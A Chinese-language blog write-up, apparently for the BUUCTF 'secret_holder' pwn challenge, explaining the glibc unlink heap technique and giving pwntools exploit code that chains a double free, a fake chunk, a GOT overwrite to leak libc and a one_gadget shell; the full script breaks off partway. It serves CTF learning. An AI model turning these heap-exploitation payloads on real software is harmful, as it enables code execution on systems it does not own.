<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="A1ex">
    
    <!-- Completely eliminate flash of wrong theme -->
    <script>
        (function() {
            const THEME_KEY = "REDEFINE-THEME-STATUS";
            const DARK = "dark", LIGHT = "light";
            
            // Get preferred theme
            function getTheme() {
                try {
                    const saved = localStorage.getItem(THEME_KEY);
                    if (saved) {
                        const { isDark } = JSON.parse(saved);
                        return isDark ? DARK : LIGHT;
                    }
                } catch (e) {}
                
                return matchMedia("(prefers-color-scheme: dark)").matches ? DARK : LIGHT;
            }
            
            // Apply theme to document
            function applyTheme(theme) {
                const isDark = theme === DARK;
                const root = document.documentElement;
                
                // Set classes for compatibility
                root.classList.add(theme);
                root.classList.remove(isDark ? LIGHT : DARK);
                root.style.colorScheme = theme;
            }
            
            // Initial application
            const theme = getTheme();
            applyTheme(theme);
            
            // Listen for system preference changes
            matchMedia("(prefers-color-scheme: dark)").addEventListener("change", ({ matches }) => {
                // Only update if using system preference (no localStorage entry)
                if (!localStorage.getItem(THEME_KEY)) {
                    applyTheme(matches ? DARK : LIGHT);
                }
            });
            
            // Set body classes ASAP (before DOMContentLoaded)
            (function() {
                const addBodyClass = () => {
                    const b = document.body;
                    if (!b) return false;
                    b.classList.add(theme + "-mode");
                    return true;
                };

                // Try immediately
                if (addBodyClass()) return;

                // Observe until body exists
                const mo = new MutationObserver(() => {
                    if (addBodyClass()) mo.disconnect();
                });
                mo.observe(document.documentElement, { childList: true, subtree: true });
            })();
        })();
    </script>
    
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2025/12/17/buuctf-secret-holder/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
    
        
        <meta name="description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF-secret_holder">
<meta property="og:url" content="http://example.com/2025/12/17/BUUCTF-secret-holder/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/redefine-og.webp">
<meta property="article:published_time" content="2025-12-17T11:19:05.000Z">
<meta property="article:modified_time" content="2025-12-17T12:02:15.619Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="PWN">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/redefine-og.webp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/redefine-favicon.svg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/redefine-favicon.svg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/redefine-favicon.svg">
    <!--- Page Info-->
    
    <title>
        
            BUUCTF-secret_holder | A1ex&#39;s blogs.
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en","path":"search.json"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"side_tools":{"gear_rotation":true,"auto_expand":false},"open_graph":{"enable":true,"image":"/images/redefine-og.webp","description":"Hexo Theme Redefine, Redefine Your Hexo Journey."},"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Welcome to A1ex's security blogs.","subtitle":{"text":["Focus on smart contract audit and reverse engineering"],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":50,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":"蝴蝶","artist":"陶喆","url":"http://t4z2rakny.hn-bkt.clouddn.com/mp3/%E8%9D%B4%E8%9D%B6.mp3","cover":"https://i.ytimg.com/vi/1wkI80-fpPw/hqdefault.jpg","lrc":null},{"name":"歌谣","artist":"李荣浩","url":"http://t4z2rakny.hn-bkt.clouddn.com/mp3/%E6%AD%8C%E8%B0%A3.mp3","cover":"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ-pyZey8DKVpsr5qL5JDfPLOVcv6mDH3yVjQ&s","lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1"}},"version":"2.8.5","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"FreeTalk":{"path":"/shuoshuo","icon":"fa-regular fa-chart-bar"}},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 8.1.0"></head>



<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                A1ex&#39;s blogs.
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/shuoshuo"
                                        >
                                    <i class="fa-regular fa-chart-bar fa-fw"></i>
                                    FREETALK
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i>
                    </div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/shuoshuo"
                        >
                            <span>
                                FREETALK
                            </span>
                            
                                <i class="fa-regular fa-chart-bar fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">4</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">18</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">BUUCTF-secret_holder</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
				<img src="/images/avatar.png">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">A1ex</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv3</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2025-12-17 19:19:05</span>
        <span class="mobile">2025-12-17 19:19:05</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2025-12-17 20:02:15</span>
            <span class="mobile">2025-12-17 20:02:15</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/PWN/">PWN</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<p>本题主要想考察的知识点为unlink</p>
<h1 id="WP"><a href="#WP" class="headerlink" title="WP"></a>WP</h1><blockquote>
<h2 id="unlink"><a href="#unlink" class="headerlink" title="unlink"></a>unlink</h2><p>在堆中，bins（非fast bin）是以双向链表形式存在，而我们从这个链表中获取一个chunk时，会触发链表节点的删除操作</p>
<pre class="highlighter-hljs php mCustomScrollbar _mCS_1 mCS-autoHide" highlighted="true" id="pre-Rr2TGN"><div id="mCSB_1" class="mCustomScrollBox mCS-minimal-dark mCSB_vertical_horizontal mCSB_outside" tabindex="0"><div id="mCSB_1_container" class="mCSB_container mCS_x_hidden mCS_no_scrollbar_x" dir="ltr"><code-pre class="code-pre" id="pre-zXdNkc">FD = node->fd;
BK = node->bk;
FD->bk = BK;
BK->fd = FD;
</code-pre></div></div><div id="mCSB_1_scrollbar_vertical" class="mCSB_scrollTools mCSB_1_scrollbar mCS-minimal-dark mCSB_scrollTools_vertical"><div class="mCSB_draggerContainer"><div id="mCSB_1_dragger_vertical" class="mCSB_dragger"><div class="mCSB_dragger_bar"></div></div><div class="mCSB_draggerRail"></div></div></div></pre>

<p>如果我们想往一个地址(target_addr)写入任意值(my_value), 那么我们可以修改chunk的fd和bk分别为target_addr - 0x18, my_value，此时unlink操作就变成了</p>
<pre class="highlighter-hljs apache mCustomScrollbar _mCS_2 mCS-autoHide" highlighted="true" id="pre-EwABrT"><div id="mCSB_2" class="mCustomScrollBox mCS-minimal-dark mCSB_vertical_horizontal mCSB_outside" tabindex="0"><div id="mCSB_2_container" class="mCSB_container mCS_x_hidden mCS_no_scrollbar_x" dir="ltr"><code-pre class="code-pre" id="pre-2GnD5D">FD = node->fd; // FD = target_addr - 0x18
BK = node->bk; // BK = my_value
FD->bk = BK;   // *(target_addr - 0x18 + 0x18) = my_value
BK->fd = FD;   // *(my_value + 0x10) = target_addr - 0x18
</code-pre></div></div><div id="mCSB_2_scrollbar_vertical" class="mCSB_scrollTools mCSB_2_scrollbar mCS-minimal-dark mCSB_scrollTools_vertical"><div class="mCSB_draggerContainer"><div id="mCSB_2_dragger_vertical" class="mCSB_dragger"><div class="mCSB_dragger_bar"></div></div><div class="mCSB_draggerRail"></div></div></div></pre>

<p>如果没有node节点的校验，并且我们拥有(my_value + 0x10)地区的写权限的话（一般都有target_addr的写权限），我们就能实现任意地址写。<br>然而，现实很骨干，开发者们早就注意到了这个漏洞，并在unlink时加入了如下的校验：检查下一个节点的presize和当前节点的size是否相同，且 <code>FD-&gt;bk == P &amp;&amp; BK-&gt;fd == P</code></p>
<p>加入了这样一个校验机制之后，我们就不能直接达成任意地址写这个目标了。然而，道高一尺魔高一丈，前辈们想出了一种间接任意写的办法。让我们仔细看下这段校验的代码, 令FD &#x3D; &amp;P - 0x18, BK &#x3D; &amp;P - 0x10, 此时</p>
<ul>
<li>FD-&gt;bk &#x3D; P<ul>
<li>*(FD + 0x18) &#x3D; P</li>
<li>*(&amp;P - 0x18 + 0x18) &#x3D; *(&amp;P) &#x3D; P</li>
</ul>
</li>
<li>BK-&gt;fd &#x3D; P<ul>
<li>*(BK + 0x10) &#x3D; P</li>
<li>*(&amp;P - 0x10 + 0x10) &#x3D; *(&amp;P) &#x3D; P</li>
</ul>
</li>
</ul>
<p>校验通过，继续执行赋值语句</p>
<ul>
<li>FD-&gt;bk &#x3D; BK<ul>
<li>*(&amp;P - 0x18 + 0x18) &#x3D; &amp;P - 0x10</li>
<li>P &#x3D; &amp;P - 0x10;</li>
</ul>
</li>
<li>BK-&gt;fd &#x3D; FD<ul>
<li>*(&amp;P - 0x10 + 0x10) &#x3D; &amp;P - 0x18</li>
<li>P &#x3D; &amp;P - 0X18;</li>
</ul>
</li>
</ul>
<p>最终效果为P &#x3D; &amp;P - 0x18, 让我们来个图直观感受一下unlink前后的内存布局变化</p>
</blockquote>
<p>很绕，但是你就记住，使用unlink手法后，你控制的指针p变成了p-0x18</p>
<p>通过unlink，我们成功让原本指向堆的指针指向了指针上方的一块区域。又由于题目中一般允许让用户对堆的内容重新输入，此时（第一次输入）我们只需要写入 <code>p64(0) * 3 + p64(target_addr)</code>，覆盖掉P的指针, 即可让P指向我们想要写入内容的地址，然后（第二次输入）写入 <code>p64(my_value)</code>，就能实现任意地址写。</p>
<h2 id="题解"><a href="#题解" class="headerlink" title="题解"></a>题解</h2><p>这个文件是动态加载的，题目中有三个堆 <code>buf_small</code>, <code>buf_big</code>, <code>buf_huge</code>，用三个变量 <code>init_small</code>, <code>init_big</code>, <code>init_huge</code>来标识是否被使用，在keep方法中，直接用read读取size个字符，并且没有用 <code>\0</code>结束读入的字符串，可能存在信息泄露。在wipe中，没有判断flag就直接free掉了buf，这里是一个double free漏洞。renew方法则是重新给三个堆赋值。</p>
<blockquote>
<h2 id="总体思路"><a href="#总体思路" class="headerlink" title="总体思路"></a>总体思路</h2><ol>
<li>构造fake chunk</li>
<li>执行unlink</li>
<li>泄露libc基址</li>
<li>执行one_gadget</li>
</ol>
</blockquote>
<p>这里可以结合给出的堆图理解，但是最好是直接在gdb中调试，查看heap的变化</p>
<blockquote>
<p>keep(1)<br>wipe(1)<br>keep(2)<br>wipe(1) # double free<br>keep(1) # overlap</p>
<p>上述代码wipe1执行后，查看heap，会发现big也不见了，逐步调试就会发现，keep2执行时分配的chunk的起始位置就是keep1的位置，因此由于double free 的原因wipe1的时候，wipe了keep2的chunk，此时big 、small都指向同一个位置，再次keep1，分配出一个chunk1</p>
</blockquote>
<p>unlink之前需要做一些准备，buf_huge的大小是400000字节，最初的top chunk无法满足，我们需要先alloc一次，（这次会通过mmap分配，并扩大mmap分配的内存阈值），再free掉，再alloc第二次，第二次获取的堆地址才是我们想要的buf_huge地址(和buf_small, buf_big)相邻</p>
<blockquote>
<p>keep(3)<br>wipe(3)<br>keep(3)</p>
<p>首先，第一个keep3执行时，由于glibc全局参数mmap_threshold默认值通常是 <strong>128KB (0x20000)，这时申请的大小为0x40000于是直接调用 <code>mmap</code> 系统调用向内核单独申请一块内存。释放后又重新申请，Glibc 的开发者认为：</strong>“既然程序刚才申请了这么大一块内存，用完又还回来了，说明程序可能经常需要这种大内存。如果每次都用 mmap&#x2F;munmap 系统调用，开销太大了。不如我把阈值调高一点，下次这种大小的内存直接在堆里切给它。”，你进入gdb逐步调试，就会发现，此时在small 和top chunk之间出现了一个0x40000大小的chunk，结构成了small-huge-top。</p>
<p>注意：small和big的指针都指向同一个地址，但是大小不同</p>
</blockquote>
<p>现在我们需要将chunk丢进unsorted bin以便泄漏地址</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">small_ptr = 0x6020b0 # ida静态分析获取</span><br><span class="line">big_ptr = 0x6020a0   # 同上</span><br><span class="line"></span><br><span class="line">payload = p64(0)</span><br><span class="line">payload += p64(0x21)             # fake size</span><br><span class="line">payload += p64(small_ptr - 0x18) # 绕过FD-&gt;bk == P &amp;&amp; BK-&gt;fd == P</span><br><span class="line">payload += p64(small_ptr - 0x10) # 同上</span><br><span class="line">payload += p64(0x20)             # huge.pre_size, 绕过chunksize(P) != prev_size (next_chunk(P))</span><br><span class="line">payload += p64(0x61a90)          # huge.size</span><br><span class="line">renew(2, payload)                # 构造fake chunk</span><br><span class="line">wipe(3)                          # 触发unlink</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p>这里需要解释一下动机，我们知道unlink后你控制的指针-0x18，我们这里的payload构造的逻辑：</p>
<p>1.设置0x21是因为设置p位，防止进一步向下拓展</p>
<p>2.0x20，是因为要绕过unlink的大小检查，</p>
<p>3.0x61a90，设置p位为0，当释放huge的时候，chunk会向下合并</p>
<p>再说一次，你通过heap看到的地址是chunk的起始地址，而直接调用renew是chunk+0x10的地址</p>
</blockquote>
<p>现在我们的small指针指向了small-0x18，接下来我们需要泄漏libc</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">payload = b&#x27;a&#x27; * 8</span><br><span class="line">payload += p64(elf.got[&#x27;free&#x27;]) # *big_ptr = free@got.plt</span><br><span class="line">payload += b&#x27;a&#x27; * 8</span><br><span class="line">payload += p64(big_ptr)         # *small_ptr = big_ptr</span><br><span class="line">renew(1, payload)</span><br><span class="line">renew(2, p64(elf.plt[&#x27;puts&#x27;]))  # *free@got.plt = puts@plt</span><br><span class="line">renew(1, p64(elf.got[&#x27;puts&#x27;]))  # *big_ptr = puts@got.plt</span><br><span class="line"></span><br><span class="line">wipe(2)                         # puts(puts@got.plt)</span><br><span class="line">puts_addr = u64(io.recvline()[:6].ljust(8, b&#x27;\0&#x27;))</span><br><span class="line">libc_base = puts_addr - libc.symbols[&#x27;puts&#x27;]</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<p><strong>第一次 <code>renew(1)</code> (在 Step 1):</strong></p>
<ul>
<li><strong>目的</strong> ：把 <code>big_ptr</code> 指向 <code>free@got</code>。</li>
<li><strong>后续动作</strong> ：利用 <code>renew(2)</code> 向 <code>big_ptr</code> 指向的地址写入数据。</li>
<li><strong>结果</strong> ：将 <code>free@got</code> 里的内容（原本是 <code>free</code> 的地址）覆盖为了 <code>puts@plt</code>。</li>
<li><strong>本质</strong> ：这是为了 <strong>劫持控制流</strong> （把 <code>free</code> 变成 <code>puts</code>）。</li>
</ul>
<p><strong>第二次 <code>renew(1)</code></strong></p>
<ul>
<li><strong>目的</strong> ：把 <code>big_ptr</code> 指向 <code>puts@got</code>。</li>
<li><strong>后续动作</strong> ：利用 <code>wipe(2)</code> 触发函数调用。</li>
<li><strong>结果</strong> ：执行 <code>puts(big_ptr指向的内容)</code>。</li>
<li><strong>本质</strong> ：这是为了 <strong>传递参数</strong> ，以便泄露信息。</li>
</ul>
<p><strong>此时的状态：</strong></p>
<ul>
<li><strong>函数</strong> ：因为劫持成功，<code>wipe(2)</code> 实际上调用的是 <code>puts(...)</code>。</li>
<li><strong>参数</strong> ：<code>puts</code> 的参数是 <code>big_ptr</code> 指向的地址。</li>
<li><strong>问题来了</strong> ：此时 <code>big_ptr</code> 指向哪里？</li>
<li>指向  <strong><code>puts@got</code></strong> 。因此会打印出puts的地址内存地址，由此我们可以进一步计算出libc地址</li>
</ul>
<p>最后利用one_gadge修改地址</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">one_gadget = libc_base +0x4368e</span><br><span class="line">payload = b&#x27;a&#x27; * 0x10</span><br><span class="line">payload += p64(elf.got[&#x27;puts&#x27;]) # *small_ptr = puts@got.plt</span><br><span class="line">renew(1, payload)</span><br><span class="line">renew(1, p64(one_gadget))       # puts@got.plt = one_gadget</span><br><span class="line">io.interactive()</span><br><span class="line"></span><br><span class="line">#这里small还是指向big的，因此在执行renew后，small指向了puts的got，然后第二次执行，将修改puts的got的内容为one_gadge的内容</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<p>完整exp</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">context.log_level = &#x27;debug&#x27;</span><br><span class="line"></span><br><span class="line">io = process(&#x27;./SecretHolder_patch&#x27;)</span><br><span class="line">libc = ELF(&#x27;/opt/glibc-2.23/lib/libc.so.6&#x27;)</span><br><span class="line">elf = ELF(&#x27;./SecretHolder_patch&#x27;)</span><br><span class="line">def keep(idx):</span><br><span class="line">    io.sendlineafter(b&#x27;Renew secret\n&#x27;, b&#x27;1&#x27;)</span><br><span class="line">    io.sendlineafter(b&#x27;Huge secret\n&#x27;, str(idx))</span><br><span class="line">    io.sendafter(b&#x27;secret: \n&#x27;, b&#x27;aaaa&#x27;)</span><br><span class="line"></span><br><span class="line">def wipe(idx):</span><br><span class="line">    io.sendlineafter(b&#x27;Renew secret\n&#x27;, b&#x27;2&#x27;)</span><br><span class="line">    io.sendlineafter(b&#x27;Huge secret\n&#x27;, str(idx))</span><br><span class="line"></span><br><span class="line">def renew(idx, data):</span><br><span class="line">    io.sendlineafter(b&#x27;Renew secret\n&#x27;, b&#x27;3&#x27;)</span><br><span class="line">    io.sendlineafter(b&#x27;Huge secret\n&#x27;, str(idx))</span><br><span class="line">    io.sendafter(b&#x27;secret: \n&#x27;, data)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">  </span><br><span class="line">  gdb.attach(io)</span><br><span class="line">  log.info(&quot;start&quot;)</span><br><span class="line"> # pause()</span><br><span class="line">  keep(1)</span><br><span class="line">  wipe(1)</span><br><span class="line">  log.info(&quot;wipe1&quot;)</span><br><span class="line">  #pause()</span><br><span class="line">  keep(2)</span><br><span class="line">  log.info(&quot;keep2&quot;)</span><br><span class="line">  #pause()</span><br><span class="line">  wipe(1)</span><br><span class="line">  log.info(&quot;double free 1&quot;)</span><br><span class="line">  #pause()</span><br><span class="line">  keep(1)</span><br><span class="line">  log.info(&quot;uaf1&quot;)</span><br><span class="line">  #pause()</span><br><span class="line">  keep(3)</span><br><span class="line">  log.info(&quot;keep3&quot;)</span><br><span class="line">  #pause()</span><br><span class="line">  wipe(3)</span><br><span class="line">  log.info(&quot;wipe3&quot;)</span><br><span class="line">  #pause()</span><br><span class="line">  keep(3)</span><br><span class="line">  log.info(&quot;keep3 